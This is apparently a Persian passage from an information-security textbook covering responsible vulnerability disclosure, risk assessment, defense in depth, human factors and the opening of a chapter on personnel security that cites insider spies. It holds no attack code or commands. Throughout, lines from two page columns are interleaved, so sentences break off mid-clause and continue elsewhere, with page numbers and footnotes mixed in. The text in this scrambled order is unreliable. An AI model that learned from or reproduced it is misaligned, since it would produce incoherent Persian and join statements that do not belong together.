‫ﻣﺎ ﻣﻮﺍﺭﺩ ﺯﻳﺎﺩﻱ ﺩﻳﺪﻩ ﺍﻳـﻢ ﻛـﻪ ﺩﺭ ﺁﻥ ﻓـﺮﺩﻱ ﻣﺘﺨـﺼﺺ ﻳـﻚ‬
‫ﺷﺪ ﺍﻳﻦ ﻧﻴﺴﺖ ﻛﻪ ﺑﮕﻮﻳﻴﻢ ﺑﻼﻓﺎﺻﻠﻪ ﺑﻌﺪ ﺍﺯ ﺍﻳﻨﻜـﻪ ﺣﻔـﺮﻩﻫـﺎﻱ‬
‫ﺍﺷﻜﺎﻝ ﻣﻬﻢ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺩﺭ ﻳﻚ ﮔﺮﻭﻩ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑـﺴﻴﺎﺭ‬
‫ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﭘﻴﺪﺍ ﻛﺮﺩﻳـﺪ ﺁﻧـﺮﺍ ﺑﻄـﻮﺭ ﮔـﺴﺘﺮﺩﻩ ﺑـﻪ ﺍﻃـﻼﻉ ﻋﻤـﻮﻡ‬
‫ﻋﻤﻮﻣﻲ ﮔﺰﺍﺭﺵ ﻛﺮﺩﻩ ﺍﺳﺖ‪ .‬ﺍﮔﺮﭼﻪ ﻫﺪﻑ ﺍﻳﻦ ﺷﺨﺺ ﺩﺭﻳﺎﻓﺖ‬
‫ﺑﺮﺳﺎﻧﻴﺪ‪ .‬ﻣﻴﺎﻥ ﻣﺨﻔﻲﻛﺎﺭﻱ ﻭ ﺍﺣﺘﻴﺎﻁ ﺗﻔﺎﻭﺗﻬـﺎﻱ ﻋﻤـﺪﻩ ﻭﺟـﻮﺩ‬
‫ﻳﻚ ﺍﺻﻼﺡ ﺳﺮﻳﻊ ﺍﺯ ﺟﺎﻧﺐ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﺑﻮﺩﻩ‪ ،‬ﻭﻟﻲ ﻧﺘﻴﺠـﺔ ﻛـﺎﺭ‬
‫ﺩﺍﺭﺩ‪ .‬ﺍﮔﺮ ﺩﺭ ﻳﻚ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺗﻮﺯﻳﻊﺷﺪﻩ ﻳﺎ ﭘﺮﻣﺼﺮﻑ ﺣﻔﺮﺓ ﺍﻣﻨﻴﺘـﻲ‬
‫ﻣﻮﺟﻲ ﺍﺯ ﺗﻬﺎﺟﻤﺎﺕ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﺷﺪﻩ ﻛﻪ ﺭﺍﻫﺒـﺮﺍﻥ ﺁﻧﻬـﺎ ﺑـﻪ‬
‫ﻛﺸﻒ ﻛﺮﺩﻳﺪ ﺑﺎﻳﺪ ﺑﺪﻭﻥ ﺳﺮ ﻭ ﺻﺪﺍ ﻭ ﻫﺮﭼـﻪ ﺳـﺮﻳﻌﺘﺮ ﺁﻧـﺮﺍ ﺑـﻪ‬
‫ﻣﻄﺎﻟﺐ ﺁﻥ ﮔﺮﻭﻩ ﭘﺴﺘﻲ ﺩﺳﺘﺮﺳﻲ ﻧﺪﺍﺷﺘﻪ ﻭ ﻳﺎ ﻗـﺎﺩﺭ ﺑـﻪ ﺍﻋﻤـﺎﻝ‬
‫ﺍﺻﻼﺡ ﺍﺭﺍﺋﻪﺷﺪﻩ ﻧﺒﻮﺩﻩﺍﻧﺪ‪.‬‬
‫ﺍﮔﺮ ﻫﻨﻮﺯ ﻭﺻﻠﻪﺍﻱ ﺑﺮﺍﻱ ﺁﺳﻴﺐﭘـﺬﻳﺮﻳﻬﺎﻱ ﺍﺧﻴـﺮ ﺳﻴـﺴﺘﻢ ﺷـﻤﺎ‬ ‫ﺗﺎ ﺯﻣﺎﻧﻲ ﻛﻪ ﺷﻤﺎ ﻫﻤﺔ ﻗﺴﻤﺘﻬﺎﻱ ﻳﻚ ﻧﺮﻡﺍﻓـﺰﺍﺭ ﺭﺍ ﺑﻮﺳـﻴﻠﺔ ﺧـﻮﺩ ﻭ ﺩﺭ‬ ‫‪۸۷‬‬
‫ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﺧﻮﺩﺗﺎﻥ ﺗﻮﺳﻌﻪ ﻧﺪﻫﻴﺪ‪ ،‬ﺍﻓﺮﺍﺩ ﻣﺨﺘﻠﻔﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑـﻪ‬
‫ﻭﺟﻮﺩ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ ،‬ﺍﺭﺳﺎﻝ ﺟﺰﺋﻴﺎﺕ ﺁﻧﻬﺎ ﺑﻪ ﻳـﻚ ﮔـﺮﻭﻩ ﭘـﺴﺘﻲ‬
‫ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻛﺮﺩﻩ ﺑﺎﺷﻨﺪ ﻭ ﺍﻳﻦ ﺍﺣﺘﻤﺎﻝ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ‬
‫ﻧﻪﺗﻨﻬﺎ ﺑﺴﻴﺎﺭﻱ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺩﻳﮕﺮ ﺭﺍ ﺑﻪ ﻣﺨﺎﻃﺮﻩ ﺧﻮﺍﻫﺪ ﺍﻧﺪﺍﺧﺖ‪،‬‬ ‫ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﺗﺼﺎﺩﻓﹰﺎ ﻳﺎ ﺗﻌﻤﺪﹰﺍ ﺍﻓﺸﺎ ﺷﻮﺩ‪.‬‬
‫‪١٥٧‬‬ ‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬

‫ﻼ ﻓﻜﺮ ﻛﺮﺩﻩﺍﻳﺪ ﺑﻪ ﺳﺮﺍﻍ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺑﺮﻭﻳـﺪ؛‬


‫ﺭﻭﻱ ﺁﻧﻬﺎ ﻛﺎﻣ ﹰ‬ ‫ﺑﻠﻜﻪ ﺍﮔﺮ ﻳﻚ ﻧﻔﻮﺫﮔﺮ ﺍﺯ ﺁﻥ ﺍﺷﻜﺎﻝ ﺑـﺮﺍﻱ ﻧﻔـﻮﺫ ﺑـﻪ ﺳـﺎﻳﺘﻬﺎﻱ‬
‫ﭼﺮﺍﻛﻪ ﻧﻤﻲﺗﻮﺍﻧﻴﺪ ﺩﺭ ﻣﻘﺎﺑﻞ ﺗﻤـﺎﻡ ﺗﻬﺪﻳـﺪﺍﺕ ﻣﻤﻜـﻦ‪ ،‬ﺣﻔﺎﻇـﺖ‬ ‫ﺩﻳﮕﺮ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭ ﺭﺍﺑﻄﻪ ﺑـﺎ ﺧـﺴﺎﺭﺗﻬﺎﻱ ﻭﺍﺭﺩﻩ‬
‫ﺑﻮﺟﻮﺩ ﺁﻭﺭﻳﺪ‪ .‬ﮔـﺎﻫﻲ ﺍﻭﻗـﺎﺕ ﺑﺠـﺎﻱ ﺟﻠـﻮﮔﻴﺮﻱ ﺍﺯ ﻭﻗـﻮﻉ ﻳـﻚ‬ ‫ﻋﻠﻴﻪ ﺷﻤﺎ ﻧﻴﺰ ﺍﻗﺪﺍﻣﺎﺕ ﻗﺎﻧﻮﻧﻲ ﺻﻮﺭﺕ ﺑﮕﻴﺮﺩ‪ ٨٨.‬ﺍﮔﺮ ﺷﻤﺎ ﻧﮕـﺮﺍﻥ‬
‫ﻣﺸﻜﻞ ﺑﺎﻳﺪ ﺍﺟﺎﺯﻩ ﺩﻫﻴﺪ ﺁﻥ ﻣﺸﻜﻞ ﺭﺥ ﺩﻫﺪ ﻭ ﺳـﭙﺲ ﺑـﻪ ﺭﻓـﻊ‬ ‫ﺍﻣﻨﻴﺖ ﺧﻮﺩ ﻫﺴﺘﻴﺪ ﻣﺘﻮﺟـﻪ ﺑﺎﺷـﻴﺪ ﻛـﻪ ﺟﺰﺋـﻲ ﺍﺯ ﻳـﻚ ﺟﺎﻣﻌـﻪ‬
‫ﺁﺛﺎﺭ ﺁﻥ ﺍﻗﺪﺍﻡ ﻛﻨﻴﺪ‪ .‬ﺑﺮﺍﻱ ﻣﺜﺎﻝ ﺩﺭ ﻣﻮﺍﺟﻬﻪ ﺑﺎ ﻳﻚ ﻗﻄﻌـﻲ ﺑـﺮﻕ‬ ‫ﻣﻲﺑﺎﺷﻴﺪ‪ .‬ﺩﺭ ﺟﺎﻣﻌﻪ ﺑﺎﻳﺪ ﺑﺪﻧﺒﺎﻝ ﺗﻘﻮﻳﺖ ﺍﻣﻨﻴﺖ ﺩﻳﮕﺮﺍﻥ ﻫﻢ ﺑـﻮﺩ‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﺷﺮﺍﻳﻂ ﻃﻮﺭﻱ ﺑﺎﺷﺪ ﻛـﻪ ﺍﮔـﺮ ﺑﮕﺬﺍﺭﻳـﺪ ﺳﻴـﺴﺘﻤﻬﺎ‬ ‫ﻭ ﺑﻪ ﻳﺎﺩ ﺩﺍﺷﺖ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺭﻭﺯﻱ ﻫﻢ ﻣﺎ ﺑﻪ ﻛﻤﻚ ﺩﻳﮕﺮﺍﻥ‬
‫ﺧﺎﻣﻮﺵ ﻭ ﺭﺍﻩﺍﻧـﺪﺍﺯﻱ ﻣﺠـﺪﺩ ﺷـﻮﻧﺪ ﺑﺮﺍﻳﺘـﺎﻥ ﺑـﺴﻴﺎﺭ ﺍﺭﺯﺍﻧﺘـﺮ ﺍﺯ‬ ‫ﻧﻴﺎﺯ ﭘﻴﺪﺍ ﻛﻨﻴﻢ‪.‬‬
‫ﺧﺮﻳﺪﺍﺭﻱ ﻳﻚ ﺳﻴﺴﺘﻢ ‪ UPS‬ﺗﻤﺎﻡ ﺷﻮﺩ‪.‬‬
‫ﺟﻤﻊﺑﻨﺪﻱ ﺑﺤﺚ ﭘﻴﺸﮕﻴﺮﻱ ﻭ ﺳﻴﺎﺳﺖ‬
‫ﻣﻮﺍﺭﺩ ﺩﻳﮕﺮﻱ ﻫﺴﺘﻨﺪ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺷـﻤﺎ ﺩﺭ ﻣـﻮﺭﺩ ﺩﻓـﺎﻉ ﺩﺭ‬
‫ﻣﻘﺎﺑﻞ ﺁﻧﻬﺎ ﺍﻳﺪﺓ ﺧﺎﺻﻲ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ )ﻣﺜﻞ ﺗﻬـﺎﺟﻢ ﻳـﻚ ﺑﻴﮕﺎﻧـﻪ ﺍﺯ‬ ‫ﻛﻠﻴﺪ ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﺓ ﻣﻮﻓﻖ‪ ،‬ﺗﺸﺨﻴﺺ ﻫﻤﺔ ﺗﻬﺪﻳﺪﺍﺕ ﻣﻤﻜـﻦ‬
‫ﻓﻀﺎ(؛ ﻳﺎ ﺑﻪ ﺁﻥ ﺳﺒﺐ ﻛﻪ ﺑﺴﻴﺎﺭ ﻏﻴﺮ ﻣﺤﺘﻤـﻞ ﻫـﺴﺘﻨﺪ‪ ،‬ﺩﻓـﺎﻉ ﺩﺭ‬ ‫ﻋﻠﻴﻪ ﺳﻴﺴﺘﻢ ﻭ ﺩﻓﺎﻉ ﺩﺭ ﺑﺮﺍﺑﺮ ﺣﻤﻼﺗﻲ ﺍﺳﺖ ﻛـﻪ ﺍﺯ ﻧﻈـﺮ ﺷـﻤﺎ‬
‫ﻣﻘﺎﺑﻠﺸﺎﻥ ﺑﺴﻴﺎﺭ ﺳﺨﺖ ﺑﺎﺷﺪ )ﻣﺜﻞ ﻭﻗـﻮﻉ ﻳـﻚ ﺍﻧﻔﺠـﺎﺭ ﻫـﺴﺘﻪﺍﻱ ﺩﺭ‬ ‫ﺍﺣﺘﻤﺎﻝ ﻭﻗﻮﻉ ﺑﻴﺸﺘﺮﻱ ﺩﺍﺭﻧﺪ‪.‬‬
‫‪ ۲۰۰‬ﻣﺘﺮﻱ ﻣﺮﻛﺰ ﺍﻃﻼﻋﺎﺕ ﺷﻤﺎ( ﻳﺎ ﺑﺴﻴﺎﺭ ﻓﺎﺟﻌﻪﺁﻣﻴﺰﺗﺮ ﺍﺯ ﺁﻥ ﺑﺎﺷـﻨﺪ‬ ‫ﺍﻳﻨﻜﻪ ﺍﻧﺴﺎﻥ ﺿﻌﻴﻔﺘﺮﻳﻦ ﺣﻠﻘﺔ ﺍﻣﻨﻴﺘﻲ ﺍﺳﺖ ﺑﻪ ﺍﻳﻦ ﻣﻌﻨﺎ ﻧﻴـﺴﺖ‬
‫ﻛﻪ ﺑﺘﻮﺍﻥ ﺑﺎ ﺁﻧﻬﺎ ﻣﻘﺎﺑﻠﻪ ﻛﺮﺩ )ﻣﺜﻞ ﺍﻳﻨﻜﻪ ﻣﺪﻳﺮ ﺷﻤﺎ ﺗﺼﻤﻴﻢ ﺑﮕﻴﺮﺩ ﻛـﻪ‬
‫ﺑﺨﺶ ﺳﻮﻡ‬

‫ﻛﻪ ﺑﺎﻳﺪ ﺣﻔﺎﻇﺖ ﺍﺯ ﻧﻘﺎﻁ ﺿﻌﻒ ﺩﻳﮕـﺮ ﺭﺍ ﺑـﻪ ﻓﺮﺍﻣﻮﺷـﻲ ﺳـﭙﺮﺩ‪.‬‬


‫ﺗﻤﺎﻡ ﻣﺎﺷﻴﻨﻬﺎﻱ ﻳﻮﻧﻴﻜﺲ ﺭﺍ ﺗﺒﺪﻳﻞ ﺑﻪ ﻳﻚ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻣﻌﺮﻭﻓﺘـﺮ ﻧﻤﺎﻳـﺪ!(‪.‬‬ ‫ﺍﻧﺴﺎﻥ ﻏﻴﺮﻗﺎﺑﻞ ﭘﻴﺶﺑﻴﻨﻲ ﺍﺳﺖ ﺍﻣﺎ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳـﻚ ﻣـﻮﺩﻡ‬
‫ﻛﻠﻴﺪ ﺭﻣﺰ ﻣﺪﻳﺮﻳﺖ ﺧﻮﺏ‪ ،‬ﺩﺍﻧﺴﺘﻦ ﭼﻴﺰﻫﺎﻳﻲ ﺍﺳﺖ ﻛـﻪ ﺩﺭ ﻣـﻮﺭﺩ‬ ‫ﻛﻪ ﺭﻣﺰ ﻋﺒﻮﺭ ﻧﺪﺍﺭﺩ ﺑﺴﻴﺎﺭ ﺳﺎﺩﻩﺗﺮ ﺍﺯ ﻣﺘﻘﺎﻋﺪ ﻛﺮﺩﻥ ﻳﻚ ﻛﺎﺭﻣﻨـﺪ‬
‫ﺁﻧﻬﺎ ﻧﮕﺮﺍﻧﻲ ﺩﺍﺭﻳﺪ ﻭ ﻧﻴﺰ ﺍﻳﻨﻜﻪ ﻫﺮﻳـﻚ ﺍﺯ ﺍﻳـﻦ ﻣـﺴﺎﺋﻞ ﺗـﺎ ﭼـﻪ‬ ‫ﻛﻠﻴﺪﻱ ﺑﻪ ﺩﺭﻳﺎﻓﺖ ﺭﺷﻮﻩ ﺍﺳﺖ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﻫﺮﺟـﺎ ﻛـﻪ ﺍﻣﻜـﺎﻥ ﺁﻥ‬
‫ﺍﻧﺪﺍﺯﻩ ﻧﮕﺮﺍﻥﻛﻨﻨﺪﻩ ﻫﺴﺘﻨﺪ‪.‬‬ ‫ﻲ ﻣﺒﺘﻨﻲ ﺑﺮ ﻓﻨﺎﻭﺭﻱ‬ ‫ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﺑﺎﻳﺪ ﺍﺯ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﺗﺪﺍﻓﻌ ﹺ‬
‫ﺗﺼﻤﻴﻢﮔﻴﺮﻱ ﺩﺭ ﻣﻮﺭﺩ ﺁﻧﭽﻪ ﻛﻪ ﻣﻲﺧﻮﺍﻫﻴﺪ ﺍﺯ ﺁﻥ ﺣﻔﺎﻇﺖ ﻛﻨﻴﺪ‬ ‫ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﻢ ﻭ ﺍﻣﻨﻴﺖ ﻛﺎﺭﻛﻨﺎﻥ ﺧﻮﺩ ﺭﺍ ﺑـﺎ ﺁﻣـﻮﺯﺵ ﻛـﺎﺭﺑﺮﺍﻥ ﻭ‬
‫ﻭ ﻫﺰﻳﻨﻪﻫﺎﻳﻲ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺑـﺮﺍﻱ ﺟﻠـﻮﮔﻴﺮﻱ ﺍﺯ ﺗﻠﻔـﺎﺕ ﺁﻥ‬ ‫ﻛﺎﺭﻛﻨﺎﻥ ﺑﻬﺒﻮﺩ ﺑﺨﺸﻴﻢ‪ .‬ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ﺑﻪ ﺩﻓﺎﻉ ﺩﺭ ﻋﻤـﻖ ﺗﻜﻴـﻪ‬
‫ﺑﺪﻫﻴﺪ ﺭﺍ ﺩﺭ ﻣﻘﺎﺑﻞ ﻫﺰﻳﻨﻪﻫﺎﻱ ﺗﺮﻣﻴﻢ ﺿﺮﺭﻫﺎﻱ ﻧﺎﺷـﻲ ﺍﺯ ﻳـﻚ‬ ‫ﻣﻲﻛﻨـﻴﻢ‪ :‬ﻣﺮﺍﺣـﻞ ﭼﻨﺪﮔﺎﻧـﺔ ﺩﻓـﺎﻋﻲ ﻣﺜـﻞ ﭘـﺸﺘﻴﺒﺎﻧﻬﺎ ﺭﺍ ﺑﻜـﺎﺭ‬
‫ﺭﺧﺪﺍﺩ ﻗﺮﺍﺭ ﺩﻫﻴﺪ‪ .‬ﺁﻧﮕﺎﻩ ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﺍﻳﻦ ﺟﺪﻭﻝ ﻭ ﺑﺮ ﺍﺳﺎﺱ ﻳﻚ‬ ‫ﻣﻲﺑﺮﻳﻢ ﺗﺎ ﺩﺭﺻﻮﺭﺕ ﻧﺎﻣﻮﻓﻖ ﺑﻮﺩﻥ ﻳﻚ ﻻﻳـﻪ ﺩﺭ ﺗـﺄﻣﻴﻦ ﺩﻓـﺎﻉ‬
‫ﻓﻬﺮﺳﺖ ﺍﻭﻟﻮﻳﺖﺑﻨﺪﻱﺷﺪﻩ ﺍﺯ ﺍﻛﺜـﺮ ﻗﺮﻳـﺐ ﺑـﻪ ﺍﺗﻔـﺎﻕ ﻧﻴﺎﺯﻫـﺎﻱ‬ ‫ﻻﺯﻡ‪ ،‬ﺩﭼﺎﺭ ﺯﻳﺎﻧﻬﺎﻱ ﺍﺳﺎﺳﻲ ﻧﺸﻮﻳﻢ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﻳﻚ ﺳﻴـﺴﺘﻢ‬
‫ﺣﻴﺎﺗﻲ‪ ،‬ﺗﺼﻤﻴﻢ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﻣﻮﺭﺩ ﻓﻌﺎﻟﻴﺘﻬـﺎ ﻭ ﻣﻌﻴﺎﺭﻫـﺎﻱ ﺍﻣﻨﻴﺘـﻲ‬ ‫ﺟﺎﻳﮕﺰﻳﻦ ‪ UPS‬ﻣﻲﺧﺮﻳﻢ؛ ﻳﺎ ﻫﺮﭼﻨﺪ ﺭﻭﻱ ﺩﺭ ﺳـﺎﺧﺘﻤﺎﻥ ﻳـﻚ‬
‫ﺑﮕﻴﺮﻳﺪ‪ .‬ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛـﻪ ﺩﺭ ﺍﻳـﻦ ﺗﺤﻠﻴـﻞ ﻋـﻼﻭﻩ ﺑـﺮ‬ ‫ﻗﻔﻞ ﻣﺴﺘﺤﻜﻢ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ‪ ،‬ﻗﻔـﻞ ﺟﺪﺍﮔﺎﻧـﻪﺍﻱ ﺭﻭﻱ ﺩﺭ ﻭﺭﻭﺩﻱ‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎ‪ ،‬ﺗﺠﻬﻴﺰﺍﺕ ﻭ ﺳﺮﻣﺎﻳﻪﻫﺎﻱ ﺩﻳﮕﺮ ﺭﺍ ﻧﻴﺰ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻪﺍﻳﺪ؛‬ ‫ﺍﺗﺎﻕ ﺭﺍﻳﺎﻧﻪ ﻗﺮﺍﺭ ﻣـﻲﺩﻫـﻴﻢ‪ .‬ﺣﻘﻴﻘـﺖ ﺍﻳـﻦ ﺍﺳـﺖ ﻛـﻪ ﻣﻬـﺎﺟﻢ‬
‫ﻭ ﻓﺮﺍﻣﻮﺵ ﻧﻜﻨﻴـﺪ ﻛـﻪ ﻧﻮﺍﺭﻫـﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥ‪ ،‬ﺍﺗـﺼﺎﻻﺕ ﺷـﺒﻜﻪ‪،‬‬ ‫ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮ ﺍﻳﻦ ﺗﺮﻛﻴﺒﻬﺎ ﻧﻴﺰ ﻏﻠﺒﻪ ﻛﻨﺪ‪ ،‬ﻭﻟـﻲ ﻣـﺎ ﻫﺰﻳﻨـﺔ ﺍﻧﺠـﺎﻡ‬
‫ﭘﺎﻳﺎﻧﻪﻫﺎ‪ ،‬ﻭ ﻣـﺪﺍﺭﻙ ﺷـﻤﺎ ﻫﻤـﻪ ﺍﺟﺰﺍﻳـﻲ ﺍﺯ ﺳﻴـﺴﺘﻢ ﻫـﺴﺘﻨﺪ ﻭ‬ ‫ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺑﺮﺍﻱ ﺍﻭ ﺑﺎﻻ ﻣﻲﺑﺮﻳﻢ؛ ﺁﻧﻘﺪﺭ ﺑﺎﻻ ﻛﻪ ﺷﺎﻳﺪ ﺑﺘﻮﺍﻧﻴﻢ ﺍﻭ ﺭﺍ‬
‫ﻫﺮﻳﻚ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺧﺴﺎﺭﺗﻬﺎﻳﻲ ﺭﺍ ﺑـﻪ ﻛـﻞ ﺳﻴـﺴﺘﻢ ﻭﺍﺭﺩ ﺁﻭﺭﻧـﺪ‪.‬‬ ‫ﻗﺎﻧﻊ ﻛﻨﻴﻢ ﻛﻪ ﻋﺒﻮﺭ ﺍﺯ ﻣﻮﺍﻧﻊ ﺳﻴﺴﺘﻢ ﻣﺎ ﺑﻪ ﺩﺭﺩﺳﺮﻫﺎﻳﻲ ﻛﻪ ﺩﺍﺭﺩ‬
‫ﺳﻼﻣﺖ ﻛﺎﺭﻛﻨﺎﻥ‪ ،‬ﺳﺎﺧﺘﻤﺎﻥ ﺷﺮﻛﺖ‪ ،‬ﻭ ﺍﻋﺘﺒﺎﺭ ﻭ ﻭﺟﻬﺔ ﻋﻤـﻮﻣﻲ‬ ‫ﻧﻤﻲﺍﺭﺯﺩ‪ .‬ﺩﺭ ﺣﺎﻟﺖ ﺣﺪﺍﻗﻠﻲ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﻣﻴﺪﻭﺍﺭ ﺑﺎﺷـﻴﺪ ﻛـﻪ ﺁﻧﻘـﺪﺭ‬
‫ﺁﻥ ﻧﻴــﺰ ﺑــﺴﻴﺎﺭ ﺣــﺎﺋﺰ ﺍﻫﻤﻴــﺖ ﻫــﺴﺘﻨﺪ ﻭ ﺑﺎﻳــﺪ ﺩﺭ ﻣﺤﺎﺳــﺒﺎﺕ‬ ‫ﺳــﺮﻋﺖ ﻣﻬــﺎﺟﻢ ﺭﺍ ﻛــﺎﻫﺶ ﺩﺍﺩﻩ ﺑﺎﺷــﻴﺪ ﻛــﻪ ﭘــﻴﺶ ﺍﺯ ﺍﻳﻨﻜــﻪ‬
‫ﻃﺮﺣﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻪ ﺷﻮﻧﺪ‪.‬‬ ‫ﺩﺍﺭﺍﺋﻴﻬﺎﻱ ﻣﻬﻢ ﺍﺯ ﺩﭼﺎﺭ ﻣﺸﻜﻞ ﺷـﻮﻧﺪ‪ ،‬ﺳﻴـﺴﺘﻤﻬﺎﻱ ﻧﻈـﺎﺭﺕ ﻭ‬
‫ﻫﺸﺪﺍﺭ‪ ،‬ﺷﻤﺎ ﺭﺍ ﺍﺯ ﺟﺮﻳﺎﻥ ﻧﻔﻮﺫ ﺁﮔﺎﻩ ﻛﻨﻨﺪ‪.‬‬
‫ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﺍﻳﻦ ﻣﺤﺪﻭﺩﻳﺘﻬﺎ ﺷﻤﺎ ﺑﺎﻳﺪ ﺑﺎ ﺍﻭﻟﻮﻳﺘﻬﺎﻳﻲ ﻛـﻪ ﺍﺯ ﻗﺒـﻞ‬

‫ﻫﺮﭼﻨﺪ ﻣﺎ ﻫﻨﻮﺯ ﻭﻗﻮﻉ ﭼﻨﻴﻦ ﻣﻮﺭﺩﻱ ﺭﺍ ﻧﺪﻳﺪﻩﺍﻳﻢ‪ ،‬ﺍﻣﺎ ﻭﻛﻴﻼﻥ ﻣﺘﻌﺪﺩﻱ‬ ‫‪۸۸‬‬
‫ﺑﻪ ﻣﺎ ﮔﻔﺘﻪﺍﻧﺪ ﻛﻪ ﺍﻧﺘﻈﺎﺭ ﺩﺍﺭﻧﺪ ﻣﻮﻛﻼﻧﺸﺎﻥ ﺍﻧﺠـﺎﻡ ﭼﻨـﻴﻦ ﻛـﺎﺭﻱ ﺭﺍ ﺍﺯ‬
‫ﺁﻧﻬﺎ ﺑﺨﻮﺍﻫﻨﺪ‪.‬‬
‫‪١٥٩‬‬ ‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬

‫ﺩﺭ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺑﻌﻀﻲ ﺳـﺎﺯﻣﺎﻧﻬﺎ ﻭ ﺍﻓـﺮﺍﺩ ﻋﻠﻴـﺮﻏﻢ ﺩﺭ‬ ‫•‬


‫ﺍﺧﺘﻴﺎﺭ ﺩﺍﺷﺘﻦ ﺗﺄﻳﻴﺪﻳﻪﻫﺎﻱ ﻣﻌﺘﺒ ﹺﺮ ﺍﻣﻨﻴﺘـﻲ ﺍﺯ ‪FBI ،CIA‬‬
‫ﻭ ﺍﺭﺗﺶ‪ ،‬ﺍﻃﻼﻋـﺎﺕ ﻃﺒﻘـﻪﺑﻨـﺪﻱ ﺷـﺪﻩﺍﻱ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴـﺎﺭ‬
‫ﺭﻭﺳﻴﻪ ﻭ ﺍﺳﺮﺍﺋﻴﻞ ﻗﺮﺍﺭ ﻣﻲﺩﺍﺩﻧﺪ )ﻣﺜﻞ ﺁﻟﺪﺭﻳﭻ ﺍﻳﻤﺰ‪ ،٩٣‬ﺟﺎﻧﺎﺗﺎﻥ‬
‫ﭘﻮﻻﺭﺩ‪ ،٩٤‬ﺭﺍﺑﺮﺕ ﻫﺎﻧﺴﻮﻥ‪ ٩٥‬ﻭ ﺭﺍﺑﺮﺕ ﻭﺍﻛﺮ‪ .(٩٦‬ﺍﻳﻦ ﺍﻓﺮﺍﺩ ﻋﻠﻴﺮﻏﻢ‬ ‫ﻓﺼﻞ ﺷﺸﻢ‬
‫ﻭﺟﻮﺩ ﻛﻨﺘﺮﻟﻬﺎﻱ ﻣﺘﻌﺪﺩ ﺍﻣﻨﻴﺘﻲ ﻗﺎﺩﺭ ﺑﻪ ﺍﻧﺠﺎﻡ ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ‬
‫ﻣﺨـﺮﺏ ﺟﺎﺳﻮﺳــﻲ ‪ -‬ﺑﻌـﻀﹰﺎ ﺗــﺎ ﺑـﻴﺶ ﺍﺯ ﻳــﻚ ﺩﻫــﻪ ‪-‬‬
‫ﺍﻣﻨﻴﺖ ﻛﺎﺭﻛﻨﺎﻥ‬
‫ﺑﻮﺩﻩﺍﻧﺪ‪.‬‬
‫ﻛﻠﻴﺎﺕ‬
‫ﺟﺎﻥ ﺩﺍﭺ‪ ٩٧‬ﺭﺋـﻴﺲ ‪ CIA‬ﺩﺭ ﺯﻣـﺎﻥ ﺭﻳﺎﺳـﺖ ﺟﻤﻬـﻮﺭﻱ‬ ‫•‬
‫ﺑﻴﻞ ﻛﻠﻴﻨﺘﻮﻥ‪ ،‬ﺍﻃﻼﻋﺎﺕ ﻣﺤﺮﻣﺎﻧﺔ ﺩﻭﻟﺘـﻲ ﺭﺍ ﺍﺯ ﺳـﺎﺯﻣﺎﻥ‬ ‫ﺍﻳﻦ ﻓﺼﻞ ﺑﻄﻮﺭ ﺧﻼﺻﻪ ﺁﻧﺪﺳﺘﻪ ﺍﺯ ﻣـﺴﺎﺋﻞ ﺍﻣﻨﻴﺘـﻲ ﺭﺍ ﺑﺮﺭﺳـﻲ‬
